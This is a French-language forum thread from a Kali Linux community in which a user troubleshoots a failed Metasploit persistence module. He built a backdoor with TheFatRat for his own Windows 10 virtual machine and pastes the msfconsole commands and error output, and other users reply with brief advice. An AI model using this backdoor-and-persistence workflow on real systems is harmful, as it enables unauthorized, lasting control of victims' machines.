Le Forum francophone communautaire des utilisateurs de Kali linux

Audit et pentest => Utilisation des outils fournis par Kali linux => Discussion démarrée par: Cookee le 17 mars 2021 à 11:47:15

Titre: Erreur au lancement d'un script de persistance
Posté par: Cookee le 17 mars 2021 à 11:47:15
Je viens poster sur ce forum car j'ai un problème au lancement d'un script de persistance.
Je m'explique : je souhaite établir une persistance sur une machine virtuelle windows 10.
Donc voici ma démarche :
- je paramètre et configure la porte dérobée avec The Fat Rat avec mon adresse ip, le numéro du port et le nom du script ;
- je déplace le script dans le dossier racine de mon site (/var/www/html)
- je retourne à une session meterpreter préalablement ouverte dans msfconsole via un exploit et je la mets en arrière plan
- et ensuite (c'est là que ça se corse) voici ce que je fais :

[*] Backgrounding session 5...
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe
msf6 post(windows/manage/persistence_exe) > set STARTUP USER
STARTUP => USER
msf6 post(windows/manage/persistence_exe) > set SESSION 5
SESSION => 5
msf6 post(windows/manage/persistence_exe) > set REXEPATH /var/www/html/persistence.exe
REXEPATH => /var/www/html/persistence.exe
msf6 post(windows/manage/persistence_exe) > exploit
[-] Post failed: Msf::OptionValidateError One or more options failed to validate: REXEPATH.
msf6 post(windows/manage/persistence_exe) > set REXEPATH /var/www/html/persistence.bat
REXEPATH => /var/www/html/persistence.bat
msf6 post(windows/manage/persistence_exe) > exploit

[*] Running module against MSEDGEWIN10
[*] Reading Payload from file /var/www/html/persistence.bat
[+] Persistent Script written to C:\Users\IEUser\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\IEUser\AppData\Local\Temp\default.exe
[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: The version of %1 is not compatible with the version you're running. Check your computer's system information to see whether you need a x86 ; or x64 ; version of the program, and then contact the software publisher.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:173:in `execute'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:120:in `target_exec'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/persistence_exe.rb:63:in `run'
[*] Post module execution completed

Comme cela est visible, j'obtiens un message d'erreur qui me parle de x86 et de x64 (donc l'architecture du processeur) et de 1% (je devine qu'il s'agit de l'application utilisée pour l'action visée). J'ai donc fait des recherches afin de savoir comment installer la version x64 comme mon processeur de 1%, notamment sur stackoverflow, mais aucun résultat.

Donc voici ma question : savez-vous comment installer 1% sur kali ? Ou, plus généralement, comment remédier à ce messag d'erreur et établir la persistance sur ma machine virtuelle windows 10 dédiée.
Car, après essai infructueux, apt-get ne semble pas être fait pour....

Merci par avance à celui (ou celle ?) qui apportera la réponse, et à ceux qui auront pris le temps de me lire.
Titre: Re : Erreur au lancement d'un script de persistance
Posté par: ZeR0-@bSoLu le 17 mars 2021 à 11:56:37
Bonjour premièrement, c'est la moindre des choses ;)

Tu as changé ta target tout simplement, et le format de ton payload...?

Après une recherche sur google : https://windowsreport.com/version-not-compatible-with-windows/
Titre: Re : Erreur au lancement d'un script de persistance
Posté par: Cookee le 17 mars 2021 à 12:01:49
Bonjour,   :)
Ok je vais regarder
Merci
Titre: Re : Erreur au lancement d'un script de persistance
Posté par: Snk le 17 mars 2021 à 12:15:44
Dejà...,
puis ,ton serveur est-il bien lancé, au moins?